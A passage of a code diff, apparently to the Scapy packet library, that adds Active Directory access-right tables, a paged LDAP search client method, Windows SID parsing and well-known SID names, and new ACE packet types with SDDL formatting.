+LDAP_CONTROL_ACCESS_RIGHTS = { + uuid.UUID("ee914b82-0a98-11d1-adbb-00c04fd8d5cd"): "Abandon-Replication", + uuid.UUID("440820ad-65b4-11d1-a3da-0000f875ae0d"): "Add-GUID", + uuid.UUID("1abd7cf8-0a99-11d1-adbb-00c04fd8d5cd"): "Allocate-Rids", + uuid.UUID("68b1d179-0d15-4d4f-ab71-46152e79a7bc"): "Allowed-To-Authenticate", + uuid.UUID("edacfd8f-ffb3-11d1-b41d-00a0c968f939"): "Apply-Group-Policy", + uuid.UUID("0e10c968-78fb-11d2-90d4-00c04f79dc55"): "Certificate-Enrollment", + uuid.UUID("a05b8cc2-17bc-4802-a710-e7c15ab866a2"): "Certificate-AutoEnrollment", + uuid.UUID("014bf69c-7b3b-11d1-85f6-08002be74fab"): "Change-Domain-Master", + uuid.UUID("cc17b1fb-33d9-11d2-97d4-00c04fd8d5cd"): "Change-Infrastructure-Master", + uuid.UUID("bae50096-4752-11d1-9052-00c04fc2d4cf"): "Change-PDC", + uuid.UUID("d58d5f36-0a98-11d1-adbb-00c04fd8d5cd"): "Change-Rid-Master", + uuid.UUID("e12b56b6-0a95-11d1-adbb-00c04fd8d5cd"): "Change-Schema-Master", + uuid.UUID("e2a36dc9-ae17-47c3-b58b-be34c55ba633"): "Create-Inbound-Forest-Trust", + uuid.UUID("fec364e0-0a98-11d1-adbb-00c04fd8d5cd"): "Do-Garbage-Collection", + uuid.UUID("ab721a52-1e2f-11d0-9819-00aa0040529b"): "Domain-Administer-Server", + uuid.UUID("69ae6200-7f46-11d2-b9ad-00c04f79f805"): "DS-Check-Stale-Phantoms", + uuid.UUID("2f16c4a5-b98e-432c-952a-cb388ba33f2e"): "DS-Execute-Intentions-Script", + uuid.UUID("9923a32a-3607-11d2-b9be-0000f87a36b2"): "DS-Install-Replica", + uuid.UUID("4ecc03fe-ffc0-4947-b630-eb672a8a9dbc"): "DS-Query-Self-Quota", + uuid.UUID("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"): "DS-Replication-Get-Changes", + uuid.UUID("1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"): "DS-Replication-Get-Changes-All", + uuid.UUID( + "89e95b76-444d-4c62-991a-0facbeda640c" + ): "DS-Replication-Get-Changes-In-Filtered-Set", + uuid.UUID("1131f6ac-9c07-11d1-f79f-00c04fc2dcd2"): "DS-Replication-Manage-Topology", + uuid.UUID( + "f98340fb-7c5b-4cdb-a00b-2ebdfa115a96" + ): "DS-Replication-Monitor-Topology", + uuid.UUID("1131f6ab-9c07-11d1-f79f-00c04fc2dcd2"): "DS-Replication-Synchronize", + uuid.UUID( + "05c74c5e-4deb-43b4-bd9f-86664c2a7fd5" + ): "Enable-Per-User-Reversibly-Encrypted-Password", + uuid.UUID("b7b1b3de-ab09-4242-9e30-9980e5d322f7"): "Generate-RSoP-Logging", + uuid.UUID("b7b1b3dd-ab09-4242-9e30-9980e5d322f7"): "Generate-RSoP-Planning", + uuid.UUID("7c0e2a7c-a419-48e4-a995-10180aad54dd"): "Manage-Optional-Features", + uuid.UUID("ba33815a-4f93-4c76-87f3-57574bff8109"): "Migrate-SID-History", + uuid.UUID("b4e60130-df3f-11d1-9c86-006008764d0e"): "msmq-Open-Connector", + uuid.UUID("06bd3201-df3e-11d1-9c86-006008764d0e"): "msmq-Peek", + uuid.UUID("4b6e08c3-df3c-11d1-9c86-006008764d0e"): "msmq-Peek-computer-Journal", + uuid.UUID("4b6e08c1-df3c-11d1-9c86-006008764d0e"): "msmq-Peek-Dead-Letter", + uuid.UUID("06bd3200-df3e-11d1-9c86-006008764d0e"): "msmq-Receive", + uuid.UUID("4b6e08c2-df3c-11d1-9c86-006008764d0e"): "msmq-Receive-computer-Journal", + uuid.UUID("4b6e08c0-df3c-11d1-9c86-006008764d0e"): "msmq-Receive-Dead-Letter", + uuid.UUID("06bd3203-df3e-11d1-9c86-006008764d0e"): "msmq-Receive-journal", + uuid.UUID("06bd3202-df3e-11d1-9c86-006008764d0e"): "msmq-Send", + uuid.UUID("a1990816-4298-11d1-ade2-00c04fd8d5cd"): "Open-Address-Book", + uuid.UUID( + "1131f6ae-9c07-11d1-f79f-00c04fc2dcd2" + ): "Read-Only-Replication-Secret-Synchronization", + uuid.UUID("45ec5156-db7e-47bb-b53f-dbeb2d03c40f"): "Reanimate-Tombstones", + uuid.UUID("0bc1554e-0a99-11d1-adbb-00c04fd8d5cd"): "Recalculate-Hierarchy", + uuid.UUID( + "62dd28a8-7f46-11d2-b9ad-00c04f79f805" + ): "Recalculate-Security-Inheritance", + uuid.UUID("ab721a56-1e2f-11d0-9819-00aa0040529b"): "Receive-As", + uuid.UUID("9432c620-033c-4db7-8b58-14ef6d0bf477"): "Refresh-Group-Cache", + uuid.UUID("1a60ea8d-58a6-4b20-bcdc-fb71eb8a9ff8"): "Reload-SSL-Certificate", + uuid.UUID("7726b9d5-a4b4-4288-a6b2-dce952e80a7f"): "Run-Protect_Admin_Groups-Task", + uuid.UUID("91d67418-0135-4acc-8d79-c08e857cfbec"): "SAM-Enumerate-Entire-Domain", + uuid.UUID("ab721a54-1e2f-11d0-9819-00aa0040529b"): "Send-As", + uuid.UUID("ab721a55-1e2f-11d0-9819-00aa0040529b"): "Send-To", + uuid.UUID("ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501"): "Unexpire-Password", + uuid.UUID( + "280f369c-67c7-438e-ae98-1d46f3c6f541" + ): "Update-Password-Not-Required-Bit", + uuid.UUID("be2bb760-7f46-11d2-b9ad-00c04f79f805"): "Update-Schema-Cache", + uuid.UUID("ab721a53-1e2f-11d0-9819-00aa0040529b"): "User-Change-Password", + uuid.UUID("00299570-246d-11d0-a768-00aa006e0529"): "User-Force-Change-Password", + uuid.UUID("3e0f7e18-2c7a-4c10-ba82-4d926db99a3e"): "DS-Clone-Domain-Controller", + uuid.UUID("084c93a2-620d-4879-a836-f0ae47de0e89"): "DS-Read-Partition-Secrets", + uuid.UUID("94825a8d-b171-4116-8146-1e34d8f54401"): "DS-Write-Partition-Secrets", + uuid.UUID("4125c71f-7fac-4ff0-bcb7-f09a41325286"): "DS-Set-Owner", + uuid.UUID("88a9933e-e5c8-4f2a-9dd7-2527416b8092"): "DS-Bypass-Quota", + uuid.UUID("9b026da6-0d3c-465c-8bee-5199d7165cba"): "DS-Validated-Write-Computer", +} + +# [MS-ADTS] sect 5.1.3.2 and +# https://learn.microsoft.com/en-us/windows/win32/secauthz/directory-services-access-rights + +LDAP_DS_ACCESS_RIGHTS = { + 0x00000001: "CREATE_CHILD", + 0x00000002: "DELETE_CHILD", + 0x00000004: "LIST_CONTENTS", + 0x00000008: "WRITE_PROPERTY_EXTENDED", + 0x00000010: "READ_PROP", + 0x00000020: "WRITE_PROP", + 0x00000040: "DELETE_TREE", + 0x00000080: "LIST_OBJECT", + 0x00000100: "CONTROL_ACCESS", + 0x00010000: "DELETE", + 0x00020000: "READ_CONTROL", + 0x00040000: "WRITE_DAC", + 0x00080000: "WRITE_OWNER", + 0x00100000: "SYNCHRONIZE", + 0x01000000: "ACCESS_SYSTEM_SECURITY", + 0x80000000: "GENERIC_READ", + 0x40000000: "GENERIC_WRITE", + 0x20000000: "GENERIC_EXECUTE", + 0x10000000: "GENERIC_ALL", +} + # Small CLDAP Answering machine: [MS-ADTS] 6.3.3 - Ldap ping @@ -827,7 +1208,7 @@ def is_request(self, req): and req.filter and isinstance(req.filter.filter, LDAP_FilterAnd) and any( - x.filter.attributeType.val == b"NtVer" for x in req.filter.filter.and_ + x.filter.attributeType.val == b"NtVer" for x in req.filter.filter.vals ) ) @@ -844,7 +1225,7 @@ def make_reply(self, req): try: DnsDomainName = next( x.filter.attributeValue.val - for x in req.protocolOp.filter.filter.and_ + for x in req.protocolOp.filter.filter.vals if x.filter.attributeType.val == b"DnsDomain" ) except StopIteration: @@ -1062,7 +1443,7 @@ def dclocator( protocolOp=LDAP_SearchRequest( filter=LDAP_Filter( filter=LDAP_FilterAnd( - and_=[ + vals=[ LDAP_Filter( filter=LDAP_FilterEqual( attributeType=ASN1_STRING(b"DnsDomain"), @@ -1165,8 +1546,7 @@ class LDAP_SASL_Buffer(Packet): # buffer." fields_desc = [ - FieldLenField("BufferLength", None, - fmt="!I", length_of="Buffer"), + FieldLenField("BufferLength", None, fmt="!I", length_of="Buffer"), _GSSAPI_Field("Buffer", LDAP), ] @@ -1191,6 +1571,22 @@ def tcp_reassemble(cls, data, *args, **kwargs): return cls(data) +class LDAP_Exception(RuntimeError): + __slots__ = ["resultCode", "diagnosticMessage"] + + def __init__(self, *args, **kwargs): + resp = kwargs.pop("resp", None) + if resp: + self.resultCode = resp.protocolOp.resultCode + self.diagnosticMessage = resp.protocolOp.diagnosticMessage.val.rstrip( + b"\x00" + ).decode(errors="backslashreplace") + else: + self.resultCode = kwargs.pop("resultCode", None) + self.diagnosticMessage = kwargs.pop("diagnosticMessage", None) + super(LDAP_Exception, self).__init__(*args, **kwargs) + + class LDAP_Client(object): """ A basic LDAP client @@ -1228,7 +1624,7 @@ class LDAP_Client(object): ssp = SPNEGOSSP([ NTLMSSP(UPN="Administrator", PASSWORD="Password1!"), KerberosSSP(UPN="Administrator@domain.local", PASSWORD="Password1!", - SPN="ldap/dc1.domain.local"), + SPN="ldap/dc1.domain.local"), ]) client.bind( LDAP_BIND_MECHS.SASL_GSS_SPNEGO, @@ -1260,6 +1656,7 @@ def __init__( self.sign = False # Session status self.sasl_wrap = False + self.bound = False self.messageID = 0 def connect(self, ip, port=None, use_ssl=False, sslcontext=None, timeout=5): @@ -1312,7 +1709,7 @@ def connect(self, ip, port=None, use_ssl=False, sslcontext=None, timeout=5): else: self.sock = StreamSocket(sock, LDAP) - def sr1(self, protocolOp, controls=None, **kwargs): + def sr1(self, protocolOp, controls: List[LDAP_Control] = None, **kwargs): self.messageID += 1 if self.verb: print(conf.color_theme.opening(">> %s" % protocolOp.__class__.__name__)) @@ -1339,10 +1736,10 @@ def sr1(self, protocolOp, controls=None, **kwargs): ) # Check for unsolicited notification if resp and LDAP in resp and resp[LDAP].unsolicited: - resp.show() if self.verb: + resp.show() print(conf.color_theme.fail("! Got unsolicited notification.")) - return resp + return resp # If signing / encryption is used, unpack if self.sasl_wrap: if resp.Buffer: @@ -1357,6 +1754,7 @@ def sr1(self, protocolOp, controls=None, **kwargs): if self.verb: if not resp: print(conf.color_theme.fail("! Bad response.")) + return else: print( conf.color_theme.success( @@ -1396,8 +1794,13 @@ def bind( self.ssp = ssp # type: SSP self.sign = sign self.encrypt = encrypt + self.sspcontext = None + + if mech is None or not isinstance(mech, LDAP_BIND_MECHS): + raise ValueError( + "'mech' attribute is required and must be one of LDAP_BIND_MECHS." + ) - assert isinstance(mech, LDAP_BIND_MECHS) if mech == LDAP_BIND_MECHS.SASL_GSSAPI: from scapy.layers.kerberos import KerberosSSP @@ -1417,11 +1820,9 @@ def bind( raise ValueError( "NTLM on LDAP does not support signing without encryption !" ) - elif mech == LDAP_BIND_MECHS.NONE: + elif mech in [LDAP_BIND_MECHS.NONE, LDAP_BIND_MECHS.SIMPLE]: if self.sign or self.encrypt: - raise ValueError( - "Cannot use 'sign' or 'encrypt' with unauthenticated (NONE) !" - ) + raise ValueError("Cannot use 'sign' or 'encrypt' with NONE or SIMPLE !") if self.ssp is not None and mech in [ LDAP_BIND_MECHS.NONE, LDAP_BIND_MECHS.SIMPLE, @@ -1447,6 +1848,7 @@ def bind( if self.verb: resp.show() raise RuntimeError("LDAP simple bind failed !") + status = GSS_S_COMPLETE elif self.mech == LDAP_BIND_MECHS.SICILY: # [MS-ADTS] sect 5.1.1.1.3 # 1. Package Discovery @@ -1495,8 +1897,10 @@ def bind( ) ) if resp.protocolOp.resultCode != 0: - resp.show() - raise RuntimeError("Sicily response failed !") + raise LDAP_Exception( + "Sicily response failed !", + resp=resp, + ) elif self.mech in [ LDAP_BIND_MECHS.SASL_GSS_SPNEGO, LDAP_BIND_MECHS.SASL_GSSAPI, @@ -1592,9 +1996,9 @@ def bind( ) ) if resp.protocolOp.resultCode != 0: - resp.show() - raise RuntimeError( - "GSSAPI SASL failed to negotiate client security flags !" + raise LDAP_Exception( + "GSSAPI SASL failed to negotiate client security flags !", + resp=resp, ) # SASL wrapping is now available. self.sasl_wrap = self.encrypt or self.sign @@ -1604,8 +2008,139 @@ def bind( # Success. if self.verb: print("%s bind succeeded !" % self.mech.name) + self.bound = True + + _TEXT_REG = re.compile(b"^[%s]*$" % re.escape(string.printable.encode())) + + def search( + self, + baseObject: str = "", + filter: str = "", + scope=0, + derefAliases=0, + sizeLimit=3000, + timeLimit=3000, + attrsOnly=0, + attributes: List[str] = [], + controls: List[LDAP_Control] = [], + ): + """ + Perform a LDAP search. + + :param baseObject: the dn of the base object to search in. + :param filter: the filter to apply to the search (currently unsupported) + :param scope: 0=baseObject, 1=singleLevel, 2=wholeSubtree + """ + if baseObject == "rootDSE": + baseObject = "" + if filter: + filter = LDAP_Filter.from_rfc2254_string(filter) + else: + # Default filter: (objectClass=*) + filter = LDAP_Filter( + filter=LDAP_FilterPresent( + present=ASN1_STRING(b"objectClass"), + ) + ) + # we loop as we might need more than one packet thanks to paging + cookie = b"" + entries = {} + while True: + resp = self.sr1( + LDAP_SearchRequest( + filter=filter, + attributes=[ + LDAP_SearchRequestAttribute(type=ASN1_STRING(attr)) + for attr in attributes + ], + baseObject=ASN1_STRING(baseObject), + scope=ASN1_ENUMERATED(scope), + derefAliases=ASN1_ENUMERATED(derefAliases), + sizeLimit=ASN1_INTEGER(sizeLimit), + timeLimit=ASN1_INTEGER(timeLimit), + attrsOnly=ASN1_BOOLEAN(attrsOnly), + ), + controls=( + controls + + ( + [ + # This control is only usable when bound. + LDAP_Control( + controlType="1.2.840.113556.1.4.319", + criticality=True, + controlValue=LDAP_realSearchControlValue( + size=500, # paging to 500 per 500 + cookie=cookie, + ), + ) + ] + if self.bound + else [] + ) + ), + timeout=3, + ) + if LDAP_SearchResponseResultDone not in resp: + resp.show() + raise TimeoutError("Search timed out.") + # Now, reassemble the results + _s = lambda x: x.decode(errors="backslashreplace") + + def _ssafe(x): + if self._TEXT_REG.match(x): + return x.decode() + else: + return x + + # For each individual packet response + while resp: + # Find all 'LDAP' layers + if LDAP not in resp: + log_runtime.warning("Invalid response: %s", repr(resp)) + break + if LDAP_SearchResponseEntry in resp.protocolOp: + attrs = { + _s(attr.type.val): [_ssafe(x.value.val) for x in attr.values] + for attr in resp.protocolOp.attributes + } + entries[_s(resp.protocolOp.objectName.val)] = attrs + elif LDAP_SearchResponseResultDone in resp.protocolOp: + resultCode = resp.protocolOp.resultCode + if resultCode != 0x0: # != success + log_runtime.warning( + resp.protocolOp.sprintf("Got response: %resultCode%") + ) + raise LDAP_Exception( + "LDAP search failed !", + resp=resp, + ) + else: + # success + if resp.Controls: + # We have controls back + realSearchControlValue = next( + ( + c.controlValue + for c in resp.Controls + if isinstance( + c.controlValue, LDAP_realSearchControlValue + ) + ), + None, + ) + if realSearchControlValue is not None: + # has paging ! + cookie = realSearchControlValue.cookie.val + break + break + resp = resp.payload + # If we have a cookie, continue + if not cookie: + break + return entries def close(self): if self.verb: print("X Connection closed\n") self.sock.close() + self.bound = False diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 4899e9dbb1c..bf4f7f7fb63 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -11,10 +11,11 @@ `SMB `_ """ -import os import collections import functools import hashlib +import os +import re import struct from scapy.automaton import select_objects @@ -758,7 +759,7 @@ class FileStreamInformation(Packet): class WINNT_SID_IDENTIFIER_AUTHORITY(Packet): fields_desc = [ - StrFixedLenField("Value", b"", length=6), + StrFixedLenField("Value", b"\x00\x00\x00\x00\x00\x01", length=6), ] def default_payload_class(self, payload): @@ -779,7 +780,7 @@ class WINNT_SID(Packet): ), FieldListField( "SubAuthority", - [], + [0], LEIntField("", 0), count_from=lambda pkt: pkt.SubAuthorityCount, ), @@ -788,6 +789,22 @@ class WINNT_SID(Packet): def default_payload_class(self, payload): return conf.padding_layer + _SID_REG = re.compile(r"^S-(\d)-(\d+)((?:-\d+)*)$") + + @staticmethod + def fromstr(x): + m = WINNT_SID._SID_REG.match(x) + if not m: + raise ValueError("Invalid SID format !") + rev, authority, subauthority = m.groups() + return WINNT_SID( + Revision=int(rev), + IdentifierAuthority=WINNT_SID_IDENTIFIER_AUTHORITY( + Value=struct.pack(">Q", int(authority))[2:] + ), + SubAuthority=[int(x) for x in subauthority[1:].split("-")], + ) + def summary(self): return "S-%s-%s%s" % ( self.Revision, @@ -798,6 +815,83 @@ def summary(self): ) +# https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers + +WELL_KNOWN_SIDS = { + # Universal well-known SID + "S-1-0-0": "Null SID", + "S-1-1-0": "Everyone", + "S-1-2-0": "Local", + "S-1-2-1": "Console Logon", + "S-1-3-0": "Creator Owner ID", + "S-1-3-1": "Creator Group ID", + "S-1-3-2": "Owner Server", + "S-1-3-3": "Group Server", + "S-1-3-4": "Owner Rights", + "S-1-4": "Non-unique Authority", + "S-1-5": "NT Authority", + "S-1-5-80-0": "All Services", + # NT well-known SIDs + "S-1-5-1": "Dialup", + "S-1-5-113": "Local account", + "S-1-5-114": "Local account and member of Administrators group", + "S-1-5-2": "Network", + "S-1-5-3": "Batch", + "S-1-5-4": "Interactive", + "S-1-5-6": "Service", + "S-1-5-7": "Anonymous Logon", + "S-1-5-8": "Proxy", + "S-1-5-9": "Enterprise Domain Controllers", + "S-1-5-10": "Self", + "S-1-5-11": "Authenticated Users", + "S-1-5-12": "Restricted Code", + "S-1-5-13": "Terminal Server User", + "S-1-5-14": "Remote Interactive Logon", + "S-1-5-15": "This Organization", + "S-1-5-17": "IUSR", + "S-1-5-18": "System (or LocalSystem)", + "S-1-5-19": "NT Authority (LocalService)", + "S-1-5-20": "Network Service", + "S-1-5-32-544": "Administrators", + "S-1-5-32-545": "Users", + "S-1-5-32-546": "Guests", + "S-1-5-32-547": "Power Users", + "S-1-5-32-548": "Account Operators", + "S-1-5-32-549": "Server Operators", + "S-1-5-32-550": "Print Operators", + "S-1-5-32-551": "Backup Operators", + "S-1-5-32-552": "Replicators", + "S-1-5-32-554": r"Builtin\Pre-Windows 2000 Compatible Access", + "S-1-5-32-555": r"Builtin\Remote Desktop Users", + "S-1-5-32-556": r"Builtin\Network Configuration Operators", + "S-1-5-32-557": r"Builtin\Incoming Forest Trust Builders", + "S-1-5-32-558": r"Builtin\Performance Monitor Users", + "S-1-5-32-559": r"Builtin\Performance Log Users", + "S-1-5-32-560": r"Builtin\Windows Authorization Access Group", + "S-1-5-32-561": r"Builtin\Terminal Server License Servers", + "S-1-5-32-562": r"Builtin\Distributed COM Users", + "S-1-5-32-568": r"Builtin\IIS_IUSRS", + "S-1-5-32-569": r"Builtin\Cryptographic Operators", + "S-1-5-32-573": r"Builtin\Event Log Readers", + "S-1-5-32-574": r"Builtin\Certificate Service DCOM Access", + "S-1-5-32-575": r"Builtin\RDS Remote Access Servers", + "S-1-5-32-576": r"Builtin\RDS Endpoint Servers", + "S-1-5-32-577": r"Builtin\RDS Management Servers", + "S-1-5-32-578": r"Builtin\Hyper-V Administrators", + "S-1-5-32-579": r"Builtin\Access Control Assistance Operators", + "S-1-5-32-580": r"Builtin\Remote Management Users", + "S-1-5-32-581": r"Builtin\Default Account", + "S-1-5-32-582": r"Builtin\Storage Replica Admins", + "S-1-5-32-583": r"Builtin\Device Owners", + "S-1-5-64-10": "NTLM Authentication", + "S-1-5-64-14": "SChannel Authentication", + "S-1-5-64-21": "Digest Authentication", + "S-1-5-80": "NT Service", + "S-1-5-80-0": "All Services", + "S-1-5-83-0": r"NT VIRTUAL MACHINE\Virtual Machines", +} + + # [MS-DTYP] sect 2.4.3 _WINNT_ACCESS_MASK = { @@ -818,6 +912,17 @@ def summary(self): # [MS-DTYP] sect 2.4.4.1 +WINNT_ACE_FLAGS = { + 0x01: "OBJECT_INHERIT", + 0x02: "CONTAINER_INHERIT", + 0x04: "NO_PROPAGATE_INHERIT", + 0x08: "INHERIT_ONLY", + 0x10: "INHERITED_ACE", + 0x40: "SUCCESSFUL_ACCESS", + 0x80: "FAILED_ACCESS", +} + + class WINNT_ACE_HEADER(Packet): fields_desc = [ ByteEnumField( @@ -850,15 +955,7 @@ class WINNT_ACE_HEADER(Packet): "AceFlags", 0, 8, - { - 0x01: "OBJECT_INHERIT", - 0x02: "CONTAINER_INHERIT", - 0x04: "NO_PROPAGATE_INHERIT", - 0x08: "INHERIT_ONLY", - 0x10: "INHERITED_ACE", - 0x40: "SUCCESSFUL_ACCESS", - 0x80: "FAILED_ACCESS", - }, + WINNT_ACE_FLAGS, ), LenField("AceSize", None, fmt=" conditional expression - condexpr = "" + cond_expr = None if hasattr(self.payload, "ApplicationData"): # Parse tokens res = [] @@ -925,7 +1023,23 @@ def lit(ct): raise ValueError("Unhandled token type %s" % ct.TokenType) if len(res) != 1: raise ValueError("Incomplete SDDL !") - condexpr = ";(%s)" % res[0] + cond_expr = "(%s)" % res[0] + return { + "ace-flags-string": ace_flag_string, + "sid-string": sid_string, + "mask": mask, + "object-guid": object_guid, + "inherited-object-guid": inherit_object_guid, + "cond-expr": cond_expr, + } + # fmt: on + + def toSDDL(self, accessMask=None): + """ + Return SDDL + """ + data = self.extractData(accessMask=accessMask) + ace_rights = "" # TODO if self.AceType in [0x9, 0xA, 0xB, 0xD]: # Conditional ACE conditional_ace_type = { 0x09: "XA", @@ -934,14 +1048,19 @@ def lit(ct): 0x0D: "ZA", }[self.AceType] return "D:(%s)" % ( - ";".join([ - conditional_ace_type, - ace_flag_string, - ace_rights, - object_guid, - inherit_object_guid, - sid - ]) + condexpr + ";".join( + x + for x in [ + conditional_ace_type, + data["ace-flags-string"], + ace_rights, + str(data["object-guid"]), + str(data["inherited-object-guid"]), + data["sid-string"], + data["cond-expr"], + ] + if x is not None + ) ) else: ace_type = { @@ -955,20 +1074,22 @@ def lit(ct): 0x13: "SP", }[self.AceType] return "(%s)" % ( - ";".join([ - ace_type, - ace_flag_string, - ace_rights, - object_guid, - inherit_object_guid, - sid - ]) + condexpr + ";".join( + x + for x in [ + ace_type, + data["ace-flags-string"], + ace_rights, + str(data["object-guid"]), + str(data["inherited-object-guid"]), + data["sid-string"], + data["cond-expr"], + ] + if x is not None + ) ) -# fmt: on - - # [MS-DTYP] sect 2.4.4.2 @@ -982,6 +1103,36 @@ class WINNT_ACCESS_ALLOWED_ACE(Packet): bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_ALLOWED_ACE, AceType=0x00) +# [MS-DTYP] sect 2.4.4.3 + + +class WINNT_ACCESS_ALLOWED_OBJECT_ACE(Packet): + fields_desc = [ + FlagsField("Mask", 0, -32, _WINNT_ACCESS_MASK), + FlagsField( + "Flags", + 0, + -32, + { + 0x00000001: "OBJECT_TYPE_PRESENT", + 0x00000002: "INHERITED_OBJECT_TYPE_PRESENT", + }, + ), + ConditionalField( + UUIDField("ObjectType", None, uuid_fmt=UUIDField.FORMAT_LE), + lambda pkt: pkt.Flags.OBJECT_TYPE_PRESENT, + ), + ConditionalField( + UUIDField("InheritedObjectType", None, uuid_fmt=UUIDField.FORMAT_LE), + lambda pkt: pkt.Flags.INHERITED_OBJECT_TYPE_PRESENT, + ), + PacketField("Sid", WINNT_SID(), WINNT_SID), + ] + + +bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_ALLOWED_OBJECT_ACE, AceType=0x05) + + # [MS-DTYP] sect 2.4.4.4 @@ -992,6 +1143,16 @@ class WINNT_ACCESS_DENIED_ACE(Packet): bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_DENIED_ACE, AceType=0x01) +# [MS-DTYP] sect 2.4.4.5 + + +class WINNT_ACCESS_DENIED_OBJECT_ACE(Packet): + fields_desc = WINNT_ACCESS_ALLOWED_OBJECT_ACE.fields_desc + + +bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_DENIED_OBJECT_ACE, AceType=0x06) + + # [MS-DTYP] sect 2.4.4.17.4+ @@ -1054,7 +1215,7 @@ def default_payload_class(self, payload): lambda pkt: pkt.TokenType in [ 0x10, # Unicode string 0x18, # Octet string - 0xf8, 0xf8, 0xfa, 0xfb, # Attribute tokens + 0xf8, 0xf9, 0xfa, 0xfb, # Attribute tokens 0x50, # Composite ] ), @@ -1074,7 +1235,7 @@ def default_payload_class(self, payload): StrLenFieldUtf16("value", b"", length_from=lambda pkt: pkt.length), lambda pkt: pkt.TokenType in [ 0x10, # Unicode string - 0xf8, 0xf8, 0xfa, 0xfb, # Attribute tokens + 0xf8, 0xf9, 0xfa, 0xfb, # Attribute tokens ] ), ( @@ -1091,7 +1252,7 @@ def default_payload_class(self, payload): StrFixedLenField("value", b"", length=0), ), lambda pkt: pkt.TokenType in [ - 0x01, 0x02, 0x03, 0x04, 0x10, 0x18, 0xf8, 0xf8, 0xfa, 0xfb, 0x50 + 0x01, 0x02, 0x03, 0x04, 0x10, 0x18, 0xf8, 0xf9, 0xfa, 0xfb, 0x50 ] ), ConditionalField( @@ -1154,7 +1315,7 @@ class WINNT_ACCESS_ALLOWED_CALLBACK_ACE(Packet): bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_ALLOWED_CALLBACK_ACE, AceType=0x09) -# [MS-DTYP] sect 2.4.4.6 +# [MS-DTYP] sect 2.4.4.7 class WINNT_ACCESS_DENIED_CALLBACK_ACE(Packet): @@ -1164,15 +1325,163 @@ class WINNT_ACCESS_DENIED_CALLBACK_ACE(Packet): bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_DENIED_CALLBACK_ACE, AceType=0x0A) +# [MS-DTYP] sect 2.4.4.8 + + +class WINNT_ACCESS_ALLOWED_CALLBACK_OBJECT_ACE(Packet): + fields_desc = WINNT_ACCESS_ALLOWED_OBJECT_ACE.fields_desc + [ + PacketField( + "ApplicationData", WINNT_APPLICATION_DATA(), WINNT_APPLICATION_DATA + ), + ] + + +bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_ALLOWED_CALLBACK_OBJECT_ACE, AceType=0x0B) + + +# [MS-DTYP] sect 2.4.4.9 + + +class WINNT_ACCESS_DENIED_CALLBACK_OBJECT_ACE(Packet): + fields_desc = WINNT_ACCESS_DENIED_OBJECT_ACE.fields_desc + [ + PacketField( + "ApplicationData", WINNT_APPLICATION_DATA(), WINNT_APPLICATION_DATA + ), + ] + + +bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_DENIED_CALLBACK_OBJECT_ACE, AceType=0x0C) + + # [MS-DTYP] sect 2.4.4.10 -class WINNT_AUDIT_ACE(Packet): +class WINNT_SYSTEM_AUDIT_ACE(Packet): fields_desc = WINNT_ACCESS_ALLOWED_ACE.fields_desc -bind_layers(WINNT_ACE_HEADER, WINNT_AUDIT_ACE, AceType=0x02) +bind_layers(WINNT_ACE_HEADER, WINNT_SYSTEM_AUDIT_ACE, AceType=0x02) + + +# [MS-DTYP] sect 2.4.4.11 + + +class WINNT_SYSTEM_AUDIT_OBJECT_ACE(Packet): + # doc is wrong. + fields_desc = WINNT_ACCESS_ALLOWED_OBJECT_ACE.fields_desc + + +bind_layers(WINNT_ACE_HEADER, WINNT_SYSTEM_AUDIT_OBJECT_ACE, AceType=0x07) + + +# [MS-DTYP] sect 2.4.4.12 + + +class WINNT_SYSTEM_AUDIT_CALLBACK_ACE(Packet): + fields_desc = WINNT_SYSTEM_AUDIT_ACE.fields_desc + [ + PacketField( + "ApplicationData", WINNT_APPLICATION_DATA(), WINNT_APPLICATION_DATA + ), + ] + + +bind_layers(WINNT_ACE_HEADER, WINNT_SYSTEM_AUDIT_CALLBACK_ACE, AceType=0x0D) + + +# [MS-DTYP] sect 2.4.4.13 + + +class WINNT_SYSTEM_MANDATORY_LABEL_ACE(Packet): + fields_desc = WINNT_SYSTEM_AUDIT_ACE.fields_desc + + +bind_layers(WINNT_ACE_HEADER, WINNT_SYSTEM_MANDATORY_LABEL_ACE, AceType=0x11) + + +# [MS-DTYP] sect 2.4.4.14 + + +class WINNT_SYSTEM_AUDIT_CALLBACK_OBJECT_ACE(Packet): + fields_desc = WINNT_SYSTEM_AUDIT_OBJECT_ACE.fields_desc + + +bind_layers(WINNT_ACE_HEADER, WINNT_SYSTEM_AUDIT_CALLBACK_OBJECT_ACE, AceType=0x0F) + +# [MS-DTYP] sect 2.4.10.1 + + +class CLAIM_SECURITY_ATTRIBUTE_RELATIVE_V1(_NTLMPayloadPacket): + _NTLM_PAYLOAD_FIELD_NAME = "Data" + fields_desc = [ + LEIntField("NameOffset", 0), + LEShortEnumField( + "ValueType", + 0, + { + 0x0001: "CLAIM_SECURITY_ATTRIBUTE_TYPE_INT64", + 0x0002: "CLAIM_SECURITY_ATTRIBUTE_TYPE_UINT64", + 0x0003: "CLAIM_SECURITY_ATTRIBUTE_TYPE_STRING", + 0x0005: "CLAIM_SECURITY_ATTRIBUTE_TYPE_SID", + 0x0006: "CLAIM_SECURITY_ATTRIBUTE_TYPE_BOOLEAN", + 0x0010: "CLAIM_SECURITY_ATTRIBUTE_TYPE_OCTET_STRING", + }, + ), + LEShortField("Reserved", 0), + FlagsField( + "Flags", + 0, + -32, + { + 0x0001: "CLAIM_SECURITY_ATTRIBUTE_NON_INHERITABLE", + 0x0002: "CLAIM_SECURITY_ATTRIBUTE_VALUE_CASE_SENSITIVE", + 0x0004: "CLAIM_SECURITY_ATTRIBUTE_USE_FOR_DENY_ONLY", + 0x0008: "CLAIM_SECURITY_ATTRIBUTE_DISABLED_BY_DEFAULT", + 0x0010: "CLAIM_SECURITY_ATTRIBUTE_DISABLED", + 